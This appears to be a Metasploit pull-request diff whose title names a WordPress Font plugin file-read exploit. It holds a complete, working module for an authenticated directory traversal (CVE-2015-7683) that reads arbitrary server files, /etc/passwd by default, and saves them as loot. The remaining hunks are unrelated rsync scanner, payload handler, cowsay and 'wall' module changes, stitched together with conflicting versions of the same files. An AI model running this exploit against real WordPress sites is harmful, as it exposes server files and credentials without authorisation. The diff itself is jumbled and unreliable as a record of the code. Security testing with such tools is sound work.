### PR TITLE
Add WP Font Plugin File Read Vulnerability

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -351,7 +351,9 @@ protected
         # we don't get new ones generated.
         blob = obj.stage_payload(
           uuid: uuid,
-          uri:  conn_id
+          uri:  conn_id,
+          lhost: datastore['OverrideRequestHost'] ? datastore['OverrideLHOST'] : (req && req.headers && req.headers['Host']) ? req.headers['Host'] : datastore['LHOST'],
+          lport: datastore['OverrideRequestHost'] ? datastore['OverrideLPORT'] : datastore['LPORT']
         )
 
         resp.body = encode_stage(blob)

--- a/lib/msf/core/payload/transport_config.rb
+++ b/lib/msf/core/payload/transport_config.rb
@@ -55,8 +55,8 @@ module Msf::Payload::TransportConfig
 
     {
       :scheme       => 'http',
-      :lhost        => datastore['LHOST'],
-      :lport        => datastore['LPORT'].to_i,
+      :lhost        => opts[:lhost],
+      :lport        => opts[:lport].to_i,
       :uri          => uri,
       :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
       :retry_total  => datastore['SessionRetryTotal'].to_i,

--- a/lib/msf/core/post_mixin.rb
+++ b/lib/msf/core/post_mixin.rb
@@ -82,6 +82,10 @@ module Msf::PostMixin
     @session
   end
 
+  def session_display_info
+    "Session: #{session.sid} (#{session.session_host})"
+  end
+
   alias :client :session
 
   #

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -995,7 +995,7 @@ require 'msf/core/exe/segment_appender'
       # Use set_template_default to normalize the :template key. It will just end up doing
       # opts[:template] = File.join(opts[:template_path], opts[:template])
       # for us, check if the file exists.
-      set_template_default(opts)
+      set_template_default(opts, 'template_x86_linux.bin')
 
       # If this isn't our normal template, we have to do some fancy
       # header patching to mark the .text section rwx before putting our

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -992,6 +992,11 @@ require 'msf/core/exe/segment_appender'
     if default
       elf = to_exe_elf(framework, opts, "template_x86_linux.bin", code)
     else
+      # Use set_template_default to normalize the :template key. It will just end up doing
+      # opts[:template] = File.join(opts[:template_path], opts[:template])
+      # for us, check if the file exists.
+      set_template_default(opts)
+
       # If this isn't our normal template, we have to do some fancy
       # header patching to mark the .text section rwx before putting our
       # payload into the entry point.

--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -1148,12 +1148,12 @@ module Text
     # text in the cowsay banner, so just do it by hand.  This big mess wraps
     # the provided text in an ASCII-cloud and then makes it look like the cloud
     # is a thought/word coming from the ASCII-cow.  Each line in the
-    # ASCII-cloud is no more than the specified number-characters long, and the cloud corners are
-    # made to look rounded
-    text_lines = text.scan(Regexp.new(".{1,#{width}}"))
+    # ASCII-cloud is no more than the specified number-characters long, and the
+    # cloud corners are made to look rounded
+    text_lines = text.scan(Regexp.new(".{1,#{width-4}}"))
     max_length = text_lines.map(&:size).sort.last
     cloud_parts = []
-    cloud_parts << " #{'_' * (max_length + 2)} "
+    cloud_parts << " #{'_' * (max_length + 2)}"
     if text_lines.size == 1
       cloud_parts << "< #{text} >"
     else
@@ -1165,7 +1165,7 @@ module Text
       end
       cloud_parts << "\\ #{text_lines.last.ljust(max_length, ' ')} /"
     end
-    cloud_parts << " #{'-' * (max_length + 2)} "
+    cloud_parts << " #{'-' * (max_length + 2)}"
     cloud_parts << <<EOS
        \\   ,__,
         \\  (oo)____

--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -1126,6 +1126,56 @@ module Text
     return output
   end
 
+  #
+  # Converts a string to one similar to what would be used by cowsay(1), a UNIX utility for
+  # displaying text as if it was coming from an ASCII-cow's mouth:
+  #
+  #       __________________
+  #      < the cow says moo >
+  #       ------------------
+  #              \   ^__^
+  #               \  (oo)\_______
+  #                  (__)\       )\/\
+  #                      ||----w |
+  #                      ||     ||
+  #
+  # @param text [String] The string to cowsay
+  # @param width [Fixnum] Width of the cow's cloud.  Default's to cowsay(1)'s default, 39.
+  def self.cowsay(text, width=39)
+    # cowsay(1) chunks a message up into 39-byte chunks and wraps it in '| ' and ' |'
+    # Rex::Text.wordwrap(text, 0, 39, ' |', '| ') almost does this, but won't
+    # split a word that has > 39 characters in it which results in oddly formed
+    # text in the cowsay banner, so just do it by hand.  This big mess wraps
+    # the provided text in an ASCII-cloud and then makes it look like the cloud
+    # is a thought/word coming from the ASCII-cow.  Each line in the
+    # ASCII-cloud is no more than the specified number-characters long, and the cloud corners are
+    # made to look rounded
+    text_lines = text.scan(Regexp.new(".{1,#{width}}"))
+    max_length = text_lines.map(&:size).sort.last
+    cloud_parts = []
+    cloud_parts << " #{'_' * (max_length + 2)} "
+    if text_lines.size == 1
+      cloud_parts << "< #{text} >"
+    else
+      cloud_parts << "/ #{text_lines.first.ljust(max_length, ' ')} \\"
+      if text_lines.size > 2
+        text_lines[1, text_lines.length - 2].each do |line|
+          cloud_parts << "| #{line.ljust(max_length, ' ')} |"
+        end
+      end
+      cloud_parts << "\\ #{text_lines.last.ljust(max_length, ' ')} /"
+    end
+    cloud_parts << " #{'-' * (max_length + 2)} "
+    cloud_parts << <<EOS
+       \\   ,__,
+        \\  (oo)____
+           (__)    )\\
+              ||--|| *
+EOS
+    cloud_parts.join("\n")
+  end
+
+
   ##
   #
   # Transforms

--- a/modules/auxiliary/scanner/http/wp_font_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_font_file_read.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Auxiliary::Report
-  include Msf::HTTP::Wordpress
+  include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Auxiliary::Scanner
 
   def initialize(info = {})

--- a/modules/auxiliary/scanner/http/wp_font_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_font_file_read.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
     fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{user}") if cookie.nil?
 
     filename = datastore['FILEPATH']
-    filename = filename[1, filename.length] if filename =~ %r{/^///}
+    filename = filename.sub(/^\//,"")
 
     res = send_request_cgi(
       'method'          => 'POST',

--- a/modules/auxiliary/scanner/http/wp_font_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_font_file_read.rb
@@ -1,0 +1,94 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress Font File Read Vulnerability',
+      'Description'    => %q{
+        This module exploits an authenticated directory traversal
+        vulnerability in WordPress Plugin "Font" version 7.4,
+        allowing to read arbitrary files with the web server privileges.
+      },
+      'References'     =>
+        [
+          ['WPVDB', '8214'],
+          ['CVE', '2015-7683'],
+          ['PACKETSTORM', '133930']
+        ],
+      'Author'         =>
+        [
+          'David Moore', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
+        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd'])
+      ], self.class)
+  end
+
+  def user
+    datastore['WP_USERNAME']
+  end
+
+  def password
+    datastore['WP_PASSWORD']
+  end
+
+  def check
+    check_plugin_version_from_readme('font', '7.5.1')
+  end
+
+  def run_host(ip)
+    vprint_status("#{peer} - Trying to login as: #{user}")
+    cookie = wordpress_login(user, password)
+    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{user}") if cookie.nil?
+
+    filename = datastore['FILEPATH']
+    filename = filename[1, filename.length] if filename =~ %r{/^///}
+
+    res = send_request_cgi(
+      'method'          => 'POST',
+      'uri'             => normalize_uri(wordpress_url_plugins, 'font', 'AjaxProxy.php'),
+      'vars_post'       => {
+        'url'           => "#{filename}",
+        'data[version]' => 7.4,
+        'format'        => 'json',
+        'action'        => 'cross_domain_request'
+      },
+      'cookie'          => cookie
+    )
+
+    if res && res.code == 200 && res.body.length > 0
+      vprint_line("#{res.body}")
+      fname = datastore['FILEPATH']
+
+      path = store_loot(
+        'font.traversal',
+        'text/plain',
+        ip,
+        res.body,
+        fname
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH.")
+    end
+  end
+
+end

--- a/modules/auxiliary/scanner/http/wp_font_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_font_file_read.rb
@@ -59,7 +59,6 @@ class Metasploit3 < Msf::Auxiliary
     fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{user}") if cookie.nil?
 
     filename = datastore['FILEPATH']
-    filename = filename.sub(/^\//,"")
 
     res = send_request_cgi(
       'method'          => 'POST',
@@ -73,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
       'cookie'          => cookie
     )
 
-    if res && res.code == 200 && res.body.length > 0
+    if res && res.code == 200 && res.body.length > 0 && !res.body.include?('success":"false')
       vprint_line("#{res.body}")
       fname = datastore['FILEPATH']
 

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
   def rsync_negotiate
     # rsync is promiscuous and will send the negotitation and motd
     # upon connecting.  abort if we get nothing
-    return unless greeting = sock.get(read_timeout)
+    return unless greeting = sock.get_once
 
     # parse the greeting control and data lines.  With some systems, the data
     # lines at this point will be the motd.
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    _, post_neg_data_lines = rsync_parse_lines(sock.get(read_timeout))
+    _, post_neg_data_lines = rsync_parse_lines(sock.get_once)
 
     motd_lines = greeting_data_lines + post_neg_data_lines
     [ version, motd_lines.empty? ? nil : motd_lines.join("\n") ]

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -56,17 +56,17 @@ class Metasploit3 < Msf::Auxiliary
   def rsync_list
     sock.puts("#list\n")
 
-    list = []
+    listing_metadata = []
     # the module listing is the module name and comment separated by a tab, each module
     # on its own line, lines separated with a newline
     sock.get(read_timeout).split(/\n/).map(&:strip).map do |module_line|
       next if module_line =~ /^#{RSYNC_HEADER} EXIT$/
       name, comment = module_line.split(/\t/).map(&:strip)
       next unless name
-      list << { name: name, comment: comment }
+      listing_metadata << { name: name, comment: comment }
     end
 
-    list
+    listing_metadata
   end
 
   # Attempts to negotiate the rsync protocol with the endpoint.
@@ -141,21 +141,21 @@ class Metasploit3 < Msf::Auxiliary
     )
     vprint_good("#{ip}:#{rport} - rsync MOTD: #{motd}") if motd
 
-    listing = rsync_list
+    listing_metadata = rsync_list
     disconnect
-    if listing.empty?
+    if listing_metadata.empty?
       print_status("#{ip}:#{rport} - rsync #{version}: no modules found")
     else
-      print_good("#{ip}:#{rport} - rsync #{version}: #{listing.size} modules found: " \
-                 "#{listing.map(&:first).join(', ')}")
+      modules = listing_metadata.map { |m| m[:name] }
+      print_good("#{ip}:#{rport} - rsync #{version}: #{modules.size} modules found: #{modules.join(', ')}")
 
       table_columns = %w(Name Comment)
       if datastore['TEST_AUTHENTICATION']
         table_columns << 'Authentication?'
-        listing.each do |listing_metadata|
+        listing_metadata.each do |module_metadata|
           connect
           rsync_negotiate(false)
-          listing_metadata[:authentication?] = rsync_requires_auth?(listing_metadata[:name])
+          module_metadata[:authentication?] = rsync_requires_auth?(module_metadata[:name])
           disconnect
         end
       end
@@ -165,7 +165,7 @@ class Metasploit3 < Msf::Auxiliary
         Msf::Ui::Console::Table::Style::Default,
         'Header' => "rsync modules for #{ip}:#{rport}",
         'Columns' => table_columns,
-        'Rows' => listing
+        'Rows' => listing_metadata.map(&:values)
       )
       vprint_line(listing_table.to_s)
 
@@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
         proto: 'tcp',
         port: rport,
         type: 'rsync_modules',
-        data: { modules: listing },
+        data: { modules: listing_metadata }
       )
     end
   end

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -107,6 +107,8 @@ class Metasploit3 < Msf::Auxiliary
     if listing.empty?
       print_status("#{ip}:#{rport} - rsync #{version}: no modules found")
     else
+      print_good("#{ip}:#{rport} - rsync #{version}: #{listing.size} modules found: " \
+                 "#{listing.map(&:first).join(', ')}")
       listing.each do |name_comment|
         connect
         rsync_negotiate
@@ -125,9 +127,6 @@ class Metasploit3 < Msf::Auxiliary
           ],
         'Rows' => listing
       )
-
-      print_good("#{ip}:#{rport} - rsync #{version}: #{listing.size} modules found: " \
-                 "#{listing.map(&:first).join(', ')}")
       vprint_line(listing_table.to_s)
 
       report_note(

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -60,11 +60,20 @@ class Metasploit3 < Msf::Auxiliary
   def rsync_requires_auth?(rmodule)
     sock.puts("#{rmodule}\n")
     res = sock.get_once(-1, read_timeout)
-    if res && (res =~ /^#{RSYNC_HEADER} AUTHREQD/)
-      true
+    if res
+      if res =~ /^#{RSYNC_HEADER} AUTHREQD/
+        true
+      elsif res =~ /^#{RSYNC_HEADER} OK/
+        false
+      else
+        vprint_error("#{peer} - unexpected response when connecting to #{rmodule}: #{res}")
+        'unknown'
+      end
     else
-      false
+      vprint_error("#{peer} - no response when connecting to #{rmodule}")
+      'unknown'
     end
+
   end
 
   def rsync_list

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -166,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
       name: 'rsync',
       info: info
     )
-    vprint_good("#{peer} - rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD']
+    print_status("#{peer} - rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD']
 
     modules_metadata = {}
     begin

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -45,6 +45,8 @@ class Metasploit3 < Msf::Auxiliary
       [
         OptBool.new('SHOW_MOTD',
                     [ true, 'Show the rsync motd, if found', false ]),
+        OptBool.new('SHOW_VERSION',
+                    [ true, 'Show the rsync version', false ]),
         OptInt.new('READ_TIMEOUT', [ true, 'Seconds to wait while reading rsync responses', 2 ])
       ]
     )
@@ -166,6 +168,7 @@ class Metasploit3 < Msf::Auxiliary
       name: 'rsync',
       info: info
     )
+    print_status("#{peer} - rsync version: #{version}") if datastore['SHOW_VERSION']
     print_status("#{peer} - rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD']
 
     modules_metadata = {}
@@ -179,10 +182,10 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     if modules_metadata.empty?
-      print_status("#{peer} - rsync #{version}: no modules found")
+      print_status("#{peer} - no rsync modules found")
     else
       modules = modules_metadata.map { |m| m[:name] }
-      print_good("#{peer} - rsync #{version}: #{modules.size} modules found: #{modules.join(', ')}")
+      print_good("#{peer} - #{modules.size} rsync modules found: #{modules.join(', ')}")
 
       table_columns = %w(Name Comment)
       if datastore['TEST_AUTHENTICATION']

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -51,7 +51,8 @@ class Metasploit3 < Msf::Auxiliary
     # on its own line, lines separated with a newline
     sock.get(read_timeout).split(/\n/).map(&:strip).map do |module_line|
       next if module_line =~ /^#{RSYNC_HEADER} EXIT$/
-      list << module_line.split(/\t/).map(&:strip)
+      name, comment = module_line.split(/\t/).map(&:strip)
+      list << [ name, comment ]
     end
 
     list

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -87,6 +87,7 @@ class Metasploit3 < Msf::Auxiliary
     connect
     version, motd = rsync_negotiate
     unless version
+      vprint_error("#{ip}:#{rport} - does not appear to be rsync")
       disconnect
       return
     end

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -80,7 +80,8 @@ class Metasploit3 < Msf::Auxiliary
         proto: 'tcp',
         port: rport,
         type: 'rsync_listing',
-        data: listing_table
+        :data   => { :modules => listing_table.rows },
+        :update => :unique_data
       )
     end
   end

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -58,23 +58,22 @@ class Metasploit3 < Msf::Auxiliary
     datastore['READ_TIMEOUT']
   end
 
-  def rsync_requires_auth?(rmodule)
+  def get_rsync_auth_state(rmodule)
     sock.puts("#{rmodule}\n")
     res = sock.get_once(-1, read_timeout)
     if res
       if res =~ /^#{RSYNC_HEADER} AUTHREQD/
-        true
+        'required'
       elsif res =~ /^#{RSYNC_HEADER} OK/
-        false
+        'not required'
       else
         vprint_error("#{peer} - unexpected response when connecting to #{rmodule}: #{res}")
-        'unknown'
+        'unexpected response'
       end
     else
       vprint_error("#{peer} - no response when connecting to #{rmodule}")
-      'unknown'
+      'no response'
     end
-
   end
 
   def rsync_list
@@ -176,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary
         modules_metadata.each do |module_metadata|
           connect
           rsync_negotiate
-          module_metadata[:authentication?] = rsync_requires_auth?(module_metadata[:name])
+          module_metadata[:authentication?] = get_rsync_auth_state(module_metadata[:name])
           disconnect
         end
       end

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary
     _, post_neg_data_lines = rsync_parse_lines(sock.get(read_timeout))
 
     motd_lines = greeting_data_lines + post_neg_data_lines
-    [ version, motd_lines.join("\n") ]
+    [ version, motd_lines.empty? ? nil : motd_lines.join("\n") ]
   end
 
   # parses the control and data lines from the provided response data

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -14,9 +14,17 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'Rsync Unauthenticated List Command',
-      'Description' => 'List all (listable) modules from a rsync daemon',
-      'Author'      => 'ikkini',
+      'Name'        => 'List Rsync Modules',
+      'Description' => %q(
+        An rsync module is essentially a directory share.  These modules can
+        optionally be protected by a password.  This module connects to and
+        negotiates with an rsync server, lists the available modules and,
+        optionally, determines if the module requires a password to access.
+      ),
+      'Author'      => [
+        'ikkini', # original metasploit module
+        'Jon Hart <jon_hart[at]rapid7.com>' # improved metasploit module
+      ],
       'References'  =>
         [
           ['URL', 'http://rsync.samba.org/ftp/rsync/rsync.html']

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -23,7 +23,8 @@ class Metasploit3 < Msf::Auxiliary
       ),
       'Author'      => [
         'ikkini', # original metasploit module
-        'Jon Hart <jon_hart[at]rapid7.com>' # improved metasploit module
+        'Jon Hart <jon_hart[at]rapid7.com>', # improved metasploit module
+        'Nixawk' # improved metasploit module
       ],
       'References'  =>
         [

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -6,7 +6,6 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
-
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
@@ -35,13 +34,13 @@ class Metasploit3 < Msf::Auxiliary
     return if version.blank?
 
     print_good("#{ip}:#{rport} - rsync #{version.strip} found")
-    report_service(:host => ip, :port => rport, :proto => 'tcp', :name => 'rsync')
+    report_service(host: ip, port: rport, proto: 'tcp', name: 'rsync')
     report_note(
-        :host => ip,
-        :proto => 'tcp',
-        :port => rport,
-        :type => 'rsync_version',
-        :data => version.strip
+      host: ip,
+      proto: 'tcp',
+      port: rport,
+      type: 'rsync_version',
+      data: version.strip
     )
 
     # making sure we match the version of the server
@@ -59,11 +58,11 @@ class Metasploit3 < Msf::Auxiliary
 
     vprint_status("#{ip}:#{rport} - #{version.rstrip} #{listing_sanitized}")
     report_note(
-        :host => ip,
-        :proto => 'tcp',
-        :port => rport,
-        :type => 'rsync_listing',
-        :data => listing_sanitized
+      host: ip,
+      proto: 'tcp',
+      port: rport,
+      type: 'rsync_listing',
+      data: listing_sanitized
     )
   end
 end

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -39,6 +39,10 @@ class Metasploit3 < Msf::Auxiliary
       ], self.class)
   end
 
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
   def read_timeout
     10
   end
@@ -90,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     unless version
-      vprint_error("#{ip}:#{rport} - no rsync negotation found")
+      vprint_error("#{peer} - no rsync negotiation found")
       return
     end
 
@@ -125,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary
     connect
     version, motd = rsync_negotiate(true)
     unless version
-      vprint_error("#{ip}:#{rport} - does not appear to be rsync")
+      vprint_error("#{peer} - does not appear to be rsync")
       disconnect
       return
     end
@@ -139,15 +143,15 @@ class Metasploit3 < Msf::Auxiliary
       name: 'rsync',
       info: info
     )
-    vprint_good("#{ip}:#{rport} - rsync MOTD: #{motd}") if motd
+    vprint_good("#{peer} - rsync MOTD: #{motd}") if motd
 
     listing_metadata = rsync_list
     disconnect
     if listing_metadata.empty?
-      print_status("#{ip}:#{rport} - rsync #{version}: no modules found")
+      print_status("#{peer} - rsync #{version}: no modules found")
     else
       modules = listing_metadata.map { |m| m[:name] }
-      print_good("#{ip}:#{rport} - rsync #{version}: #{modules.size} modules found: #{modules.join(', ')}")
+      print_good("#{peer} - rsync #{version}: #{modules.size} modules found: #{modules.join(', ')}")
 
       table_columns = %w(Name Comment)
       if datastore['TEST_AUTHENTICATION']
@@ -163,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary
       # build a table to store the module listing in
       listing_table = Msf::Ui::Console::Table.new(
         Msf::Ui::Console::Table::Style::Default,
-        'Header' => "rsync modules for #{ip}:#{rport}",
+        'Header' => "rsync modules for #{peer}",
         'Columns' => table_columns,
         'Rows' => listing_metadata.map(&:values)
       )

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
     # the module listing is the module name and comment separated by a tab, each module
     # on its own line, lines separated with a newline
     sock.get(read_timeout).split(/\n/).map(&:strip).map do |module_line|
-      next if module_line =~ /^#{RSYNC_HEADER} EXIT$/
+      break if module_line =~ /^#{RSYNC_HEADER} EXIT$/
       name, comment = module_line.split(/\t/).map(&:strip)
       next unless name
       modules_metadata << { name: name, comment: comment }

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -42,6 +42,8 @@ class Metasploit3 < Msf::Auxiliary
 
     register_advanced_options(
       [
+        OptBool.new('SHOW_MOTD',
+                    [ true, 'Show the rsync motd, if found', false ]),
         OptInt.new('READ_TIMEOUT', [ true, 'Seconds to wait while reading rsync responses', 2 ])
       ]
     )
@@ -148,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
       name: 'rsync',
       info: info
     )
-    vprint_good("#{peer} - rsync MOTD: #{motd}") if motd
+    vprint_good("#{peer} - rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD']
 
     modules_metadata = rsync_list
     disconnect

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -59,9 +59,6 @@ class Metasploit3 < Msf::Auxiliary
       listing_table = Msf::Ui::Console::Table.new(
         Msf::Ui::Console::Table::Style::Default,
         'Header' => "rsync modules",
-        'Prefix' => "\n",
-        'Postfix' => "\n",
-        'Indent' => 1,
         'Columns' =>
           [
             "Name",

--- a/modules/auxiliary/scanner/rsync/modules_list.rb
+++ b/modules/auxiliary/scanner/rsync/modules_list.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
   def rsync_negotiate(get_motd)
     # rsync is promiscuous and will send the negotitation and motd
     # upon connecting.  abort if we get nothing
-    return unless greeting = sock.get_once
+    return unless (greeting = sock.get_once)
 
     # parse the greeting control and data lines.  With some systems, the data
     # lines at this point will be the motd.

--- a/modules/post/multi/general/wall.rb
+++ b/modules/post/multi/general/wall.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Post
       text = datastore['MESSAGE']
     end
 
-    datastore['COWSAY'] ? Rex::Text.cowsay(text, 100) : text
+    datastore['COWSAY'] ? Rex::Text.cowsay(text) : text
   end
 
   def run

--- a/modules/post/multi/general/wall.rb
+++ b/modules/post/multi/general/wall.rb
@@ -16,7 +16,9 @@ class Metasploit3 < Msf::Post
           to send messages to users on the target system.
         },
         'License'       => MSF_LICENSE,
-        'Author'        => [ 'Jon Hart <jon_hart[at]rapid7.com>' ],
+        'Author'        => [
+          'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
+        ],
         # TODO: is there a way to do this on Windows?
         'Platform'      => %w(linux osx unix),
         'SessionTypes'  => %w(shell meterpreter)
@@ -24,10 +26,41 @@ class Metasploit3 < Msf::Post
     )
     register_options(
       [
-        OptString.new('MESSAGE', [true, 'The message to send']),
+        OptString.new('MESSAGE', [false, 'The message to send', '']),
         OptString.new('USERS', [false, 'List of users to write(1) to, separated by commas. ' \
-                      ' wall(1)s to all users by default'])
+                      ' wall(1)s to all users by default']),
+        OptBool.new('COWSAY', [true, 'Display MESSAGE in a ~cowsay way', false])
       ], self.class)
+  end
+
+  def cowsay(text)
+    # cowsay(1) chunks a message up into 39-byte chunks and wraps it in '| ' and ' |'
+    # Rex::Text.wordwrap(text, 0, 39, ' |', '| ') almost does this, but won't
+    # split a word that has > 39 characters in it which results in oddly formed
+    # text in the cowsay banner, so just do it by hand
+    text_lines = text.scan(/.{1,34}/)
+    max_length = text_lines.map(&:size).sort.last
+    cloud_parts = []
+    cloud_parts << " #{'_' * (max_length + 2)} "
+    if text_lines.size == 1
+      cloud_parts << "< #{text} >"
+    else
+      cloud_parts << "/ #{text_lines.first.ljust(max_length, ' ')} \\"
+      if text_lines.size > 2
+        text_lines[1, text_lines.length - 2].each do |line|
+          cloud_parts << "| #{line.ljust(max_length, ' ')} |"
+        end
+      end
+      cloud_parts << "\\ #{text_lines.last.ljust(max_length, ' ')} /"
+    end
+    cloud_parts << " #{'-' * (max_length + 2)} "
+    cloud_parts << <<EOS
+       \\   ,__,
+        \\  (oo)____
+           (__)    )\\
+              ||--|| *
+EOS
+    cloud_parts.join("\n")
   end
 
   def users
@@ -35,14 +68,24 @@ class Metasploit3 < Msf::Post
   end
 
   def message
-    datastore['MESSAGE'] ? datastore['MESSAGE'] : "Hello metasploit session #{session.id}, the time is #{Time.now}"
+    if datastore['MESSAGE'].blank?
+      text = "Hello from a metasploit session at #{Time.now}"
+    else
+      text = datastore['MESSAGE']
+    end
+
+    datastore['COWSAY'] ? cowsay(text) : text
   end
 
   def run
     if users
+      # this requires that the target user has write turned on
       users.map { |user| cmd_exec("echo '#{message}' | write #{user}") }
     else
-      cmd_exec("echo '#{message}' | wall")
+      # this will send the messages to all users, regardless of whether or
+      # not they have write turned on.  If the session is root, the -n will disable
+      # the annoying banner
+      cmd_exec("echo '#{message}' | wall -n")
     end
   end
 end

--- a/modules/post/multi/general/wall.rb
+++ b/modules/post/multi/general/wall.rb
@@ -33,40 +33,6 @@ class Metasploit3 < Msf::Post
       ], self.class)
   end
 
-  def cowsay(text)
-    # cowsay(1) chunks a message up into 39-byte chunks and wraps it in '| ' and ' |'
-    # Rex::Text.wordwrap(text, 0, 39, ' |', '| ') almost does this, but won't
-    # split a word that has > 39 characters in it which results in oddly formed
-    # text in the cowsay banner, so just do it by hand.  This big mess wraps
-    # the provided text in an ASCII-cloud and then makes it look like the cloud
-    # is a thought/word coming from the ASCII-cow.  Each line in the
-    # ASCII-cloud is no more than 34-characters long, and the cloud corners are
-    # made to look rounded
-    text_lines = text.scan(/.{1,34}/)
-    max_length = text_lines.map(&:size).sort.last
-    cloud_parts = []
-    cloud_parts << " #{'_' * (max_length + 2)} "
-    if text_lines.size == 1
-      cloud_parts << "< #{text} >"
-    else
-      cloud_parts << "/ #{text_lines.first.ljust(max_length, ' ')} \\"
-      if text_lines.size > 2
-        text_lines[1, text_lines.length - 2].each do |line|
-          cloud_parts << "| #{line.ljust(max_length, ' ')} |"
-        end
-      end
-      cloud_parts << "\\ #{text_lines.last.ljust(max_length, ' ')} /"
-    end
-    cloud_parts << " #{'-' * (max_length + 2)} "
-    cloud_parts << <<EOS
-       \\   ,__,
-        \\  (oo)____
-           (__)    )\\
-              ||--|| *
-EOS
-    cloud_parts.join("\n")
-  end
-
   def users
     datastore['USERS'] ? datastore['USERS'].split(/\s*,\s*/) : nil
   end
@@ -78,7 +44,7 @@ EOS
       text = datastore['MESSAGE']
     end
 
-    datastore['COWSAY'] ? cowsay(text) : text
+    datastore['COWSAY'] ? Rex::Text.cowsay(text, 100) : text
   end
 
   def run

--- a/modules/post/multi/general/wall.rb
+++ b/modules/post/multi/general/wall.rb
@@ -37,7 +37,11 @@ class Metasploit3 < Msf::Post
